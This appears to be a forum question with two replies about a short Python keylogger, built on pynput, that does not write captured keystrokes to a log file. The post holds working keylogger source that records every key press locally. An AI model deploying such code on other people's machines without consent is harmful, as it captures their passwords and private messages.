# python keylogger program is not saving key strokes in file

Tags: python, function, logging, error-logging, keylogger

```
from pynput.keyboard import Key, Listener
import logging

log_dir = ""

logging.basicConfig(filename=(log_dir + "keylogs.txt"), level=logging.DEBUG, format='%(asctime)s: %(message)s')

def on_press(key):
    logging.info(str(key))

with Listener(on_press=on_press) as listener:
    listener.join() 

# why won't the program log the keys into the keylogs.txt file?
```

Comment: I copy and pase your code, it's works on my linux. what is your python version and OS ?

Comment: Please edit the question to limit it to a specific problem with enough detail to identify an adequate answer.